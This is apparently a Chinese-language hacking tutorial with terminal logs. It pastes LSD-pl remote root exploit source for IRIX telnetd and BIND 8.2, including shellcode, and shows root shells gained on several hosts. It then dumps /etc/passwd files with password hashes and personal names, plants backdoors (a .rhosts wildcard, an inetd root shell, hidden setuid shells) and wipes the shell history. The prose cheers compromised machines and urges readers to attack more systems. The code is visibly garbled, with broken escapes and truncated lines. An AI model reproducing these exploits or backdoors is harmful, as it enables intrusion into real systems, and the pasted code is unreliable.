if(FD_ISSET(sck[1],&fds)){
if((cnt=read(sck[1],buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(1,buf,cnt);
}
}
}
exit(0);
/* Shared failure exit: print the errno text and leave with -1. */
err:
perror("error");exit(-1);
}
^D
# gcc -o bind bind.c -lnsl -lsocket
# ./bind
copyright LAST STAGE OF DELIRIUM feb 2001 poland //lsd-pl.net/
bind 8.2 8.2.1 8.2.2 8.2.2PX for slackware 4.0/redhat 6.2 x86
usage: ./bind address [-s][-e]
-s send infoleak packet
-e send exploit packet
#./bind 192.168.0.20 -e
copyright LAST STAGE OF DELIRIUM feb 2001 poland //lsd-pl.net/
bind 8.2 8.2.1 8.2.2 8.2.2PX for slackware 4.0/redhat 6.2 x86
stack dump:
42 24 08 08 02 00 b1 ed ca 42 c8 06 95 d0 15 c0
00 cb fa c0 a8 fc ff bf d6 58 08 08 90 3f 0d 08
f4 a4 10 40 16 00 00 00 01 00 00 00 90 3f 0d 08
05 00 00 00 e0 e7 0b 08 16 00 00 00 01 00 00 00
a0 e0 05 08 f4 a4 10 40 c4 fc ff bf 60 e9 0c 08
00 00 00 00 c8 fd ff bf c8 fd ff bf 61 d6 05 08
90 3f 0d 08 bc 76 10 40 b4 11 10 40 14 fe ff bf
01 00 00 00 bc 76 10 40
frame ptr=0xbffffc00 adr=bffffa5e ofs=86 port=e1fa connected! sent!
Linux localhost.localdomain 2.2.14-5.0 #1 Tue Aug 22 16:49:06 EDT 2000 i686 unknown
Id
uid=0(root) gid=0(root)
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/:
xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false
gdm:x:42:42::/home/gdm:/bin/bash
william:x:500:500:William Wang:/home/william:/bin/bash
www:x:688:501:web user:/home/www:/bin/bash
xeye:x:689:501:Xeye web user:/home/xeye:/bin/bash
td_ftp:x:655:50:TD Bank FTP Client:/home/td_bank:/bin/bash
cyberplex:x:690:100:Cyber:/home/cyberplex:/bin/bash
echo “test::1:0::/:/bin/bash” > /etc/passwd
telnet localhost
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
Red Hat Linux release 6.2 (Zoot)
Kernel 2.2.14-5.0 on an i686
login: test
bash$ id
uid=1(bin) gid=0(root) groups=0(root)
bash$ exit
logout
Connection closed by foreign host.
mkdir /usr/lib/…
cp /bin/sh /usr/lib/…/.x
chmod +s /usr/lib/…/.x
exit
#rm –rf /tmp/*.c
#mv bind /usr/lib/…
#mv test /usr/lib/…
#mv lpset /usr/lib/…
#mv snmp /usr/lib/…
#cd
#rm –rf .sh_history /.sh_history
#chmod 777 /usr/lib/…
#exit
$exit
-------------------------------------------------test--------------------------------------------------------------
省略了很多,如后门安装和脚印的擦除等。
其实入侵一个系统后更要注意保持自己在系统上的权限,所以清除日志以免被发现,和安放后门以便再次进入这个系统
都是很重要的。
因为以前写过这方面的教程,就不再写了。
大家慢慢提高自己的技术吧。
有时间就去扩散战果,比如Redhat 7.0和该死的freebsd。
自己想办法哦。
肉鸡找回来几台,最后一篇入侵教程总算也写完了,再见啦~
以后也许会写一些技术分析的文章。
大家好运…
snmp.c: In function `main':
snmp.c:135: warning: assignment makes pointer from integer without a cast
snmp.c:172: warning: passing arg 4 of pointer to function from incompatible pointer type
Undefined first referenced
symbol in file
xdr_void /var/tmp/cca3rEDd.o
clnttcp_create /var/tmp/cca3rEDd.o
gethostbyname /var/tmp/cca3rEDd.o
xdr_bool /var/tmp/cca3rEDd.o
xdr_u_long /var/tmp/cca3rEDd.o
authsys_create /var/tmp/cca3rEDd.o
inet_addr /var/tmp/cca3rEDd.o
clnt_pcreateerror /var/tmp/cca3rEDd.o
xdr_array /var/tmp/cca3rEDd.o
getsockname /var/tmp/cca3rEDd.o
xdr_char /var/tmp/cca3rEDd.o
xdr_pointer /var/tmp/cca3rEDd.o
ld: fatal: Symbol referencing errors. No output written to snmp (***编译失败***)
collect2: ld returned 1 exit status
# gcc -o snmp snmp.c -lnsl
snmp.c: In function `main':
snmp.c:135: warning: assignment makes pointer from integer without a cast
snmp.c:172: warning: passing arg 4 of pointer to function from incompatible pointer type
Undefined first referenced
symbol in file
getsockname /var/tmp/ccBaS71K.o
ld: fatal: Symbol referencing errors. No output written to snmp
collect2: ld returned 1 exit status
# gcc -o snmp snmp.c -lnsl -lsocket (***要利用nsl和socket的库进行编译***)
snmp.c: In function `main':
snmp.c:135: warning: assignment makes pointer from integer without a cast
snmp.c:172: warning: passing arg 4 of pointer to function from incompatible pointer type
# ./snmp
copyright LAST STAGE OF DELIRIUM mar 2001 poland //lsd-pl.net/
snmpXdmid for solaris 2.7 2.8 sparc
usage: ./snmp address [-p port] -v 7|8
#./snmp 192.168.0.4 –v 8 (***192.168.0.4 是台sunos 5.8 sparc的机器***)
copyright LAST STAGE OF DELIRIUM mar 2001 poland //lsd-pl.net/
snmpXdmid for solaris 2.7 2.8 sparc
adr=0x000c8f68 timeout=30 port=928 connected!
sent!
SunOS business 5.8 Generic_108528-03 sun4u sparc SUNW,Ultra-250
id
uid=0(root) gid=0(root)
echo “+ +” >/.rhosts
echo 'ingreslock stream tcp nowait root /bin/ksh ksh -i' > /tmp/.x
/usr/sbin/inetd -s /tmp/.x
rm -f /tmp/.x
telnet localhost 1524
Trying 127.0.0.1...
Connected to localhost. Escape character is '^]'.
# id
ksh: id^M: not found
# id;
uid=0(root) gid=0(root)
ksh: ^M: not found
# exit;
Connection closed by foreign host.
Exit (***随便装个后门走人***)
#
-------------------------------------------------test--------------------------------------------------------------
SunOS 5.6 5.7 5.8的机器都有了,找找其他系统吧。
什么系统最破呢?
Win2000?
呵呵,我说的是UNIX系列。
告诉大家,IRIX最破~
HOHO~
记得昨天就扫到一台IRIX的破机器呢,我们接着来干掉它~
-------------------------------------------------test--------------------------------------------------------------
# telnet 192.168.0.10
Trying 192.168.0.10...
Connected to 192.168.0.10.
Escape character is '^]'.
IRIX (O2)
login: test
Password:
UX:login: ERROR: Login incorrect
login:^]
telnet> quit
Connection closed.
#cat > telnetd.c (***源程序在http://lsd-pl.net/files/get?IRIX/irx_telnetd ***)
#include
#include
#include
#include
#include
#include
#include
#include
/*
 * Data tables for the IRIX telnetd listing pasted above (`cat > telnetd.c`).
 * NOTE(review): throughout this page every backslash escape is rendered as a
 * forward slash (`/x04` instead of `\x04`), so as pasted these literals hold
 * ASCII text rather than the bytes the author's per-line comments describe;
 * the compiler errors shown further down the page are the consequence.
 */
/* Machine-code bytes (the comments are the author's own disassembly, using
   MIPS-style mnemonics) followed by the string "/bin/sh".  prepare_env()
   copies this array byte by byte into env_value.  A byte string of this
   shape ending in "/bin/sh" is a usable content signature for detection. */
char shellcode[]=
"/x04/x10/xff/xff" /* bltzal $zero, */
"/x24/x02/x03/xf3" /* li $v0,1011 */
"/x23/xff/x02/x14" /* addi $ra,$ra,532 */
"/x23/xe4/xfe/x08" /* addi $a0,$ra,-504 */
"/x23/xe5/xfe/x10" /* addi $a1,$ra,-496 */
"/xaf/xe4/xfe/x10" /* sw $a0,-496($ra) */
"/xaf/xe0/xfe/x14" /* sw $zero,-492($ra) */
"/xa3/xe0/xfe/x0f" /* sb $zero,-497($ra) */
"/x03/xff/xff/xcc" /* syscall */
"/bin/sh"
;
/* One human-readable description per table row; main() prints tab1[i].vers
   for the row that produced a response. */
typedef struct{char *vers;}tabent1_t;
/* Per-row numeric parameters consumed by prepare_env(): flg selects one of
   its two output layouts, len is subtracted in its address arithmetic, and
   got/g_ofs and subbuffer/s_ofs are combined into the two values it emits. */
typedef struct{int flg,len;int got,g_ofs,subbuffer,s_ofs;}tabent2_t;
/* Rows marked "no patches" are the unpatched libc/telnetd combinations; the
   numbers listed are presumably vendor patch ids whose presence changes the
   row — confirm against the vendor's advisory.
   NOTE(review): the 7th entry below was fused with the 8th during the paste
   (the compiler output later on the page reports "parse error before `IRIX'"),
   so this copy has 12 rows while tab2 has 13 and main() indexes up to 12. */
tabent1_t tab1[]={
{ "IRIX 6.2 libc.so.1: no patches telnetd: no patches " },
{ "IRIX 6.2 libc.so.1: 1918|2086 telnetd: no patches " },
{ "IRIX 6.2 libc.so.1: 3490|3723|3771 telnetd: no patches " },
{ "IRIX 6.2 libc.so.1: no patches telnetd: 1485|2070|3117|3414 " },
{ "IRIX 6.2 libc.so.1: 1918|2086 telnetd: 1485|2070|3117|3414 " },
{ "IRIX 6.2 libc.so.1: 3490|3723|3771 telnetd: 1485|2070|3117|3414 " },
{ "IRIX 6.3 libc.so.1: no patches telnetd: { "IRIX 6.3 libc.so.1: 2087 telnetd: no patches " },
{ "IRIX 6.3 libc.so.1: 3535|3737|3770 telnetd: no patches " },
{ "IRIX 6.4 libc.so.1: no patches telnetd: no patches " },
{ "IRIX 6.4 libc.so.1: 3491|3769|3738 telnetd: no patches " },
{ "IRIX 6.5-6.5.8m 6.5-6.5.7f telnetd: no patches " },
{ "IRIX 6.5.8f telnetd: no patches " }
};
/* Columns: flg, len, got, g_ofs, subbuffer, s_ofs (see tabent2_t).  Rows
   0-5 are used for -v 62, 6-8 for 63, 9-10 for 64 and 11-12 for 65. */
tabent2_t tab2[]={
{ 0, 0x56, 0x0fb44390, 115, 0x7fc4d1e0, 0x14 },
{ 0, 0x56, 0x0fb483b0, 117, 0x7fc4d1e0, 0x14 },
{ 0, 0x56, 0x0fb50490, 122, 0x7fc4d1e0, 0x14 },
{ 0, 0x56, 0x0fb44390, 115, 0x7fc4d220, 0x14 },
{ 0, 0x56, 0x0fb483b0, 117, 0x7fc4d220, 0x14 },
{ 0, 0x56, 0x0fb50490, 122, 0x7fc4d220, 0x14 },
{ 0, 0x56, 0x0fb4fce0, 104, 0x7fc4d230, 0x14 },
{ 0, 0x56, 0x0fb4f690, 104, 0x7fc4d230, 0x14 },
{ 0, 0x56, 0x0fb52900, 104, 0x7fc4d230, 0x14 },
{ 1, 0x5e, 0x0fb576d8, 88, 0x7fc4cf70, 0x1c },
{ 1, 0x5e, 0x0fb4d6dc, 102, 0x7fc4cf70, 0x1c },
{ 1, 0x5e, 0x7fc496e8, 77, 0x7fc4cf98, 0x1c },
{ 1, 0x5e, 0x7fc496e0, 77, 0x7fc4cf98, 0x1c }
};
/* Shared output buffer filled by prepare_env(), which writes through a raw
   pointer and sprintf() without checking against this size. */
char env_value[1024];
/*
 * Build the environment-variable value sent to the target for table row
 * `vers` and return its length in bytes.  Layout, as written below: a few
 * spaces, the 4 big-endian bytes of pch, (more spaces in layout 1,) the 4
 * big-endian bytes of pch+2, three spaces, the shellcode bytes, and finally
 * a printf-style format string made of `%<width>c` and positional `%<k>$hn`
 * conversions.
 *
 * What this tells a defender: a value carrying `$hn`/`%n` conversions only
 * matters to a server that hands it to a printf-family function as the
 * *format* argument.  Strings received from the network (here: telnet
 * environment values) must be passed as data, e.g. printf("%s", v); a
 * telnetd negotiation log or a NIDS rule can alert on `%` … `$hn` inside
 * option payloads.
 *
 * NOTE(review): this copy is corrupted by the paste — the line beginning
 * `b=env_` lost its tail, both inner `for` headers are truncated, and `\x`
 * escapes appear as `/x` — so the function does not compile as shown.
 */
int prepare_env(int vers){
int i,adr,pch,adrh,adrl;
char *b;
/* Two values derived from the per-version table.  adr is then split into a
   high and a low 16-bit part with the row's len subtracted from each; these
   become the decimal widths of the `%05dc` conversions emitted at the end. */
pch=tab2[vers].got+(tab2[vers].g_ofs*4);
adr=tab2[vers].subbuffer+tab2[vers].s_ofs;
adrh=(adr>>16)-tab2[vers].len;
adrl=0x10000-(adrh&0xffff)+(adr&0xffff)-tab2[vers].len;
/* `b` walks env_value; nothing below checks against sizeof env_value.
   (This line is truncated in the paste.) */
b=env_ if(!tab2[vers].flg){
/* Layout 0: 1 space, pch big-endian, pch+2 big-endian, 3 spaces. */
for(i=0;i<1;i++) *b++=' ';
for(i=0;i<4;i++) *b++=(char)((pch>>((3-i%4)*8))&0xff);
/* `+` binds tighter than `>>`, so these are the bytes of (pch+2). */
for(i=0;i<4;i++) *b++=(char)((pch+2>>((3-i%4)*8))&0xff);
for(i=0;i<3;i++) *b++=' ';
/* Copy the shellcode, emitting any 0x02 or 0xff byte twice: 0xff is the
   telnet IAC byte, which must be doubled inside telnet data; 0x02 is
   presumably the ESC value of the telnet environment option — confirm.
   (Loop header truncated in the paste.) */
for(i=0;i
*b++=shellcode[i];
if((*(b-1)==(char)0x02)||(*(b-1)==(char)0xff)) *b++=shellcode[i];
}
/* Format string with positional `%22$hn` / `%23$hn` conversions; the
   `%05dc` widths are adrh and adrl.  Layout 1 uses positions 11/12. */
sprintf(b,"%%%05dc%%22$hn%%%05dc%%23$hn",adrh,adrl);
}else{
/* Layout 1: 5 spaces, pch big-endian, 4 spaces, pch+2 big-endian, 3 spaces. */
for(i=0;i<5;i++) *b++=' ';
for(i=0;i<4;i++) *b++=(char)((pch>>((3-i%4)*8))&0xff);
for(i=0;i<4;i++) *b++=' ';
for(i=0;i<4;i++) *b++=(char)((pch+2>>((3-i%4)*8))&0xff);
for(i=0;i<3;i++) *b++=' ';
/* Same shellcode copy with 0x02/0xff doubling (header truncated in paste). */
for(i=0;i
*b++=shellcode[i];
if((*(b-1)==(char)0x02)||(*(b-1)==(char)0xff)) *b++=shellcode[i];
}
sprintf(b,"%%%05dc%%11$hn%%%05dc%%12$hn",adrh,adrl);
}
/* Advance past the sprintf() text so the return value is the total length. */
b+=strlen(b);
return(b-env_value);
}
/*
 * Entry point of the telnetd listing.  argv[1] is the target host; `-v
 * 62|63|64|65` selects which rows of tab1/tab2 to try (default 65).  For
 * each row it opens a TCP connection to port 23, sends two telnet
 * subnegotiation blocks (the pasted bytes /xff/xfa/x24 … /xff/xf0 look like
 * IAC SB <option 36, the original telnet ENVIRON option> … IAC SE — confirm)
 * whose payload is the env_value built by prepare_env(), then writes a
 * "uname -a" command and treats any reply as success, after which it relays
 * stdin/stdout to the socket until one side closes.
 *
 * Defender's reading: the transcript below this listing shows uid=0 on an
 * unpatched IRIX host, i.e. telnetd was running as root.  The payload shape
 * (an environment value containing positional `%…$hn`) indicates the server
 * used a client-supplied string as a printf format — confirm against the
 * vendor advisory.  Observable signals: option-36 subnegotiations carrying
 * non-printable bytes plus `%…$hn`, followed on the same connection by a
 * shell command.  The "no patches" rows of tab1 name the affected
 * configurations; the vendor patches listed there, or replacing telnet with
 * ssh, close this.
 *
 * Style notes: no return type (pre-C99 implicit int); socket()/write()/read()
 * results are largely unchecked.
 */
main(int argc,char **argv){
char buffer[8192];
int i,c,sck,il,ih,cnt,vers=65;
struct hostent *hp;
struct sockaddr_in adr;
printf("copyright LAST STAGE OF DELIRIUM jul 2000 poland //lsd-pl.net//n");
printf("telnetd for irix 6.2 6.3 6.4 6.5 6.5.8 IP:all/n/n");
if(argc<2){
printf("usage: %s address [-v 62|63|64|65]/n",argv[0]);
exit(-1);
}
/* getopt runs over argv[1..] so that argv[1] can be the address.  The option
   string also declares s, c: and p:, but only -v is acted on. */
while((c=getopt(argc-1,&argv[1],"sc:p:v:"))!=-1){
switch(c){
case 'v': vers=atoi(optarg);
}
}
/* Map the version to an inclusive index range into tab1/tab2. */
switch(vers){
case 62: il=0;ih=5; break;
case 63: il=6;ih=8; break;
case 64: il=9;ih=10; break;
case 65: il=11;ih=12; break;
default: exit(-1);
}
for(i=il;i<=ih;i++){
printf(".");fflush(stdout);   /* one dot per row attempted */
sck=socket(AF_INET,SOCK_STREAM,0);   /* result not checked */
adr.sin_family=AF_INET;
adr.sin_port=htons(23);
/* Accept either a dotted quad or a host name. */
if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1){
if((hp=gethostbyname(argv[1]))==NULL){
errno=EADDRNOTAVAIL;perror("error");exit(-1);
}
memcpy(&adr.sin_addr.s_addr,hp->h_addr,4);
}
if(connect(sck,(struct sockaddr*)&adr,sizeof(struct sockaddr_in))<0){
perror("error");exit(-1);
}
cnt=prepare_env(i);   /* fills env_value for this row; cnt is its length */
/* First block: fixed 10-byte header, env_value, then the 2-byte trailer
   appended by the sprintf format — hence the length 10+cnt+2. */
memcpy(buffer,"/xff/xfa/x24/x00/x01/x58/x58/x58/x58/x00",10);
sprintf(&buffer[10],"%s/xff/xf0",env_value);
write(sck,buffer,10+cnt+2);
sleep(1);
/* Second block: same shape, different 10-byte header.  Only the first 10
   bytes of this literal are copied; its `%s/xff/xf0` tail is dead text. */
memcpy(buffer,"/xff/xfa/x24/x00/x01/x5f/x52/x4c/x44/x00%s/xff/xf0",10);
sprintf(&buffer[10],"%s/xff/xf0",env_value);
write(sck,buffer,10+cnt+2);
/* A reply shorter than 2 bytes or not starting with 0xff is taken as a sign
   that a TCP wrapper sits in front of telnetd. */
if(((cnt=read(sck,buffer,sizeof(buffer)))<2)||(buffer[0]!=(char)0xff)){
printf("warning: telnetd seems to be used with tcp wrapper/n");
}
/* Probe command: any data coming back means this row worked — print its
   description, keep the connection open, and leave the loop. */
write(sck,"/bin/uname -a/n",14);
if((cnt=read(sck,buffer,sizeof(buffer)))>0){
printf("/n%s/n/n",tab1[i].vers);
write(1,buffer,cnt);
break;
}
close(sck);
}
if(i>ih) {printf("/nerror: not vulnerable/n");exit(-1);}   /* every row failed */
/* Interactive relay: stdin -> socket and socket -> stdout via select().  A
   read returning <1 ends the session unless errno says "try again". */
while(1){
fd_set fds;
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sck,&fds);
if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){
int cnt;
char buf[1024];
if(FD_ISSET(0,&fds)){
if((cnt=read(0,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(sck,buf,cnt);
}
if(FD_ISSET(sck,&fds)){
if((cnt=read(sck,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(1,buf,cnt);
}
}
}
}
^D
# gcc -o telnetd telnetd.c
telnetd.c:33: parse error before `IRIX'
telnetd.c:37: malformed floating constant
telnetd.c:37: nondigits in number and not hexadecimal
telnetd.c:37: malformed floating constant
telnetd.c:38: malformed floating constant
telnetd.c:77: nondigits in number and not hexadecimal
… (***因为粘贴文本出错,一大堆出错信息***)
# vi telnetd.c (***只好用vi来编辑程序***)
"telnetd.c" [New file]
#include
#include
#include
…
(***重新粘贴一遍***)
…
"telnetd.c" [New file] 188 lines, 6738 characters
# gcc -o telnetd telnetd.c
Undefined first referenced
symbol in file
socket /var/tmp/ccuoeAph.o
gethostbyname /var/tmp/ccuoeAph.o
inet_addr /var/tmp/ccuoeAph.o
connect /var/tmp/ccuoeAph.o
ld: fatal: Symbol referencing errors. No output written to telnetd
collect2: ld returned 1 exit status
# gcc -o telnetd telnetd.c -lsocket -lnsl
# ./telnetd
copyright LAST STAGE OF DELIRIUM jul 2000 poland //lsd-pl.net/
telnetd for irix 6.2 6.3 6.4 6.5 6.5.8 IP:all
usage: ./telnetd address [-v 62|63|64|65]
# ./telnetd 192.168.0.10 -v 65
copyright LAST STAGE OF DELIRIUM jul 2000 poland //lsd-pl.net/
telnetd for irix 6.2 6.3 6.4 6.5 6.5.8 IP:all
.
IRIX 6.5-6.5.8m 6.5-6.5.7f telnetd: no patches
IRIX O2 6.5 05190004 IP32 (***溢出成功啦***)
id
uid=0(root) gid=0(sys)
cat /etc/passwd
root:mmanI4kyarAEA:0:0:Super-User:/:/usr/bin/tcsh
sysadm:*:0:0:System V Administration:/usr/admin:/bin/sh
cmwlogin:*:0:994:CMW Login UserID:/usr/CMW:/sbin/csh
diag:*:0:996:Hardware Diagnostics:/usr/diags:/bin/csh
daemon:*:1:1:daemons:/:/dev/null
bin:*:2:2:System Tools Owner:/bin:/dev/null
uucp:*:3:5:UUCP Owner:/usr/lib/uucp:/bin/csh
sys:*:4:0:System Activity Owner:/var/adm:/bin/sh
adm:*:5:3:Accounting Files Owner:/var/adm:/bin/sh
lp::9:9:Print Spooler Owner:/var/spool/lp:/bin/sh ***不少人进来过呢
nuucp::10:10:Remote UUCP User:/var/spool/uucppublic:/usr/lib/uucp/uucico *
auditor:*:11:0:Audit Activity Owner:/auditor:/bin/sh
dbadmin:*:12:0:Security Database Owner:/dbadmin:/bin/sh
sgiweb:*:13:60001:SGI Web Applications:/var/www/htdocs:/bin/csh
rfindd:*:66:1:Rfind Daemon and Fsdump:/var/rfindd:/bin/sh
EZsetup::992:998:System Setup:/var/sysadmdesktop/EZsetup:/bin/csh *
demos::993:997:Demonstration User:/usr/demos:/bin/csh *
OutOfBox::995:997:Out of Box Experience:/usr/people/OutOfBox:/bin/csh *
guest::998:998:Guest Account:/usr/people/guest:/bin/csh *
4Dgifts:*:999:998:4Dgifts Account:/usr/people/4Dgifts:/bin/csh
nobody:*:60001:60001:SVR4 nobody uid:/dev/null:/dev/null
noaccess:*:60002:60002:uid no access:/dev/null:/dev/null
nobody:*:60001:60001:original nobody uid:/dev/null:/dev/null
informix:*:49999:777:Informix SA 3.0:/usr/sgi/informix:/bin/csh
posuser:gyo7hUq9BFNYE:55555:20:::
antoni:zUzbvPoZ6HC4g:23117:20:antoniWang:/usr/people/antoni:/bin/csh
#mkdir /usr/lib/... (***有这么多用户可以登陆,我们做个suid root shell就可以啦。***)
cp /bin/ksh /usr/lib/.../.x
chmod +s /usr/lib/.../.x
exit
#
-------------------------------------------------test--------------------------------------------------------------
在SunOS 5.7平台下攻击IRIX 6.5 系统成功完成。:)
我们来找几台Linux 玩玩。找Redhat吧,漏洞多一些,比如rpc.statd wuftp bind lpd等。:P
我们同样以这个SunOS 5.7做为我们攻击Linux的平台。Lsd写的exploit通用性真不错。
这次我们用bind远程溢出来攻击redhat 6.2
不过因为前段时间的worm,bind的成功率已经很小啦。
大家可以试试其它的远程溢出~~
-------------------------------------------------test--------------------------------------------------------------
#cat > bind.c (***源程序在http://lsd-pl.net/files/get?LINUX/linx86_bind ***)
#include
#include
#include
#include
#include
#include
#include
/*
 * Data for the BIND listing pasted above (`cat > bind.c`).  NOTE(review): as
 * on the rest of this page, `\x` escapes appear as `/x`, so the string
 * literal below is ASCII text rather than the bytes the author's comments
 * describe.
 */
/* 23-byte hand-built DNS message that main() sends first over UDP/53 and
   whose reply it hex-dumps.  The first 12 bytes have the shape of a DNS
   header (id 0xabcd, flags 0x0980, section counts 0,1,0,0). */
char msg[]={
0xab,0xcd,0x09,0x80,0x00,0x00,0x00,0x01,
0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,
0x01,0x20,0x20,0x20,0x20,0x02,0x61
};
/* x86 machine code (author's disassembly in the comments) laid out behind
   DNS label-length bytes of 63 ("/x3f") and ending in "/bin/sh".  The two
   bytes of the `movw $0x1234,%bx` immediate are overwritten at run time by
   main() with this client's own TCP source port, which suggests the code
   searches socket descriptors for the connection back to this program —
   confirm against the listing.
   NOTE(review): the line `"/x41" /* incl %ecx …` lost a comment terminator
   in the paste, so the "/xe2/xf6" bytes that follow it are inside the
   comment and missing from the array. */
char asmcode[]=
"/x3f" /* label len 63 */
"/x90/x90/x90" /* padding */
"/xeb/x3b" /* jmp */
"/x31/xdb" /* xorl %ebx,%ebx */
"/x5f" /* popl %edi */
"/x83/xef/x7c" /* sub $0x7c,%edi */
"/x8d/x77/x10" /* leal 0x10(%edi),%esi */
"/x89/x77/x04" /* movl %esi,0x4(%edi) */
"/x8d/x4f/x20" /* leal 0x20(%edi),%ecx */
"/x89/x4f/x08" /* movl %ecx,0x8(%edi) */
"/xb3/x10" /* movb $0x10,%bl */
"/x89/x19" /* movl %ebx,(%ecx) */
"/x31/xc9" /* xorl %ecx,%ecx */
"/xb1/xff" /* movb $0xff,%cl */
"/x89/x0f" /* movl %ecx,(%edi) */
"/x51" /* pushl %ecx */
"/x31/xc0" /* xorl %eax,%eax */
"/xb0/x66" /* movb $0x66,%al */
"/xb3/x07" /* movb $0x7,%bl */
"/x89/xf9" /* movl %edi,%ecx */
"/xcd/x80" /* int $0x80 */
"/x59" /* popl %ecx */
"/x31/xdb" /* xorl %ebx,%ebx */
"/x39/xd8" /* cmpl %ebx,%eax */
"/x75/x0a" /* jne */
"/x66/xbb/x12/x34" /* movw $0x1234,%bx */
"/x66/x39/x5e/x02" /* cmpw %bx,0x2(%esi) */
"/x74/x08" /* je */
"/xe2/xe0" /* loop */
"/x3f" /* label len 63 */
"/xe8/xc0/xff/xff/xff" /* call */
"/x89/xcb" /* movl %ecx,%ebx */
"/x31/xc9" /* xorl %ecx,%ecx */
"/xb1/x03" /* movb $0x03,%cl */
"/x31/xc0" /* xorl %eax,%eax */
"/xb0/x3f" /* movb $0x3f,%al */
"/x49" /* decl %ecx */
"/xcd/x80" /* int $0x80 */
"/x41" /* incl %ecx "/xe2/xf6" /* loop */
"/xeb/x14" /* jmp */
"/x31/xc0" /* xorl %eax,%eax */
"/x5b" /* popl %ebx */
"/x8d/x4b/x14" /* leal 0x14(%ebx),%ecx */
"/x89/x19" /* movl %ebx,(%ecx) */
"/x89/x43/x18" /* movl %eax,0x18(%ebx) */
"/x88/x43/x07" /* movb %al,0x7(%ebx) */
"/x31/xd2" /* xorl %edx,%edx */
"/xb0/x0b" /* movb $0xb,%al */
"/xcd/x80" /* int $0x80 */
"/xe8/xe7/xff/xff/xff" /* call */
"/bin/sh"
"/x90/x90/x90/x90" /* padding */
"/x90/x90/x90/x90"
;
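/*
 * Return `a` in little-endian (x86 target) byte order regardless of the host
 * this program runs on: a no-op on a little-endian host, a 32-bit byte swap on
 * a big-endian one.  main() uses it in both directions -- to emit words into
 * the packet and to decode the words read back from the target's reply -- so
 * the function must be its own inverse, which a byte swap is.
 *
 * The swap is done in unsigned arithmetic.  The original computed
 * `(a&0xff)<<24` on a signed int, which is undefined behaviour whenever the
 * low byte is >= 0x80 (the result does not fit in int).  The int-in/int-out
 * interface callers rely on is unchanged.
 */
int rev(int a){
    int probe=1;
    if(*(char*)&probe) return(a);        /* little-endian host: already in target order */
    unsigned int u=(unsigned int)a;
    u=((u>>24)&0xffU)|((u>>8)&0xff00U)|((u<<8)&0xff0000U)|((u&0xffU)<<24);
    return((int)u);
}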
/*
 * Entry point.  Usage: bind <address> [-s|-e].  Resolves the target, opens a
 * UDP and a TCP socket to port 53, sends the probe `msg` over UDP, reads the
 * reply and prints its tail as a "stack dump".  With -s it stops after
 * classifying the reply; with -e it builds the second (exploit) message from
 * values in the reply plus `asmcode`, sends it, and then relays stdin/stdout
 * to the TCP socket.
 *
 * NOTE(review): this listing is a damaged transcription and does not build
 * as shown.  The #include lines above lost their header names; every "\n"
 * and "\xNN" escape appears as "/n" and "/xNN" (so the 12-byte memcpy below
 * copies the ASCII text "/xab/xcd/x01" rather than the intended bytes, and
 * the 14-byte write at the bottom sends "/bin/uname -a/" instead of the
 * command plus newline); and the statement after the header memcpy is cut
 * off mid-line.  Nothing below has been altered -- comments only.
 */
int main(int argc,char **argv){
char buffer[1024],*b;
/* flag: -1 = no mode given, 1 = -s (probe only), 2 = -e (send exploit) */
int i,c,n,sck[2],fp,ptr6,jmp,cnt,ofs,flag=-1;
struct hostent *hp;
struct sockaddr_in adr;
printf("copyright LAST STAGE OF DELIRIUM feb 2001 poland //lsd-pl.net//n");
printf("bind 8.2 8.2.1 8.2.2 8.2.2PX for slackware 4.0/redhat 6.2 x86/n/n");
if(argc<2){
printf("usage: %s address [-s][-e]/n",argv[0]);
printf(" -s send infoleak packet/n");
printf(" -e send exploit packet/n");
exit(-1);
}
/* argv[1] is the address; options are parsed starting at argv[2] */
while((c=getopt(argc-1,&argv[1],"se"))!=-1){
switch(c){
case 's': flag=1;break;
case 'e': flag=2;
}
}
if(flag==-1) exit(-1);
adr.sin_family=AF_INET;
adr.sin_port=htons(53);
/* inet_addr() returns an unsigned in_addr_t; the -1 compare relies on
 * INADDR_NONE being all-ones */
if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1) {
if((hp=gethostbyname(argv[1]))==NULL) {
errno=EADDRNOTAVAIL;goto err;
}
/* assumes an AF_INET address; hp->h_addrtype / h_length are not checked */
memcpy(&adr.sin_addr.s_addr,hp->h_addr,4);
}
/* socket() results are not checked; a -1 here only surfaces as connect()
 * failing with EBADF and jumping to err */
sck[0]=socket(AF_INET,SOCK_DGRAM,0);
sck[1]=socket(AF_INET,SOCK_STREAM,0);
if(connect(sck[0],(struct sockaddr*)&adr,sizeof(adr))<0) goto err;
if(connect(sck[1],(struct sockaddr*)&adr,sizeof(adr))<0) goto err;
/* `i` is an int passed where getsockname() expects socklen_t* -- the usual
 * source of the "incompatible pointer type" warning on this code */
i=sizeof(struct sockaddr_in);
if(getsockname(sck[1],(struct sockaddr*)&adr,&i)==-1){
/* Fallback when getsockname() fails.  The two ioctl numbers look like
 * STREAMS I_PUSH ("sockmod") and TLI TI_GETMYNAME, i.e. the Solaris way of
 * reading the local address -- consistent with the -lnsl -lsocket build
 * shown later on the page.  Neither ioctl's return value is checked, so on
 * failure adr keeps the target's address and port 53 is patched in below. */
struct netbuf {unsigned int maxlen;unsigned int len;char *buf;};
struct netbuf nb;
ioctl(sck[1],(('S'<<8)|2),"sockmod");
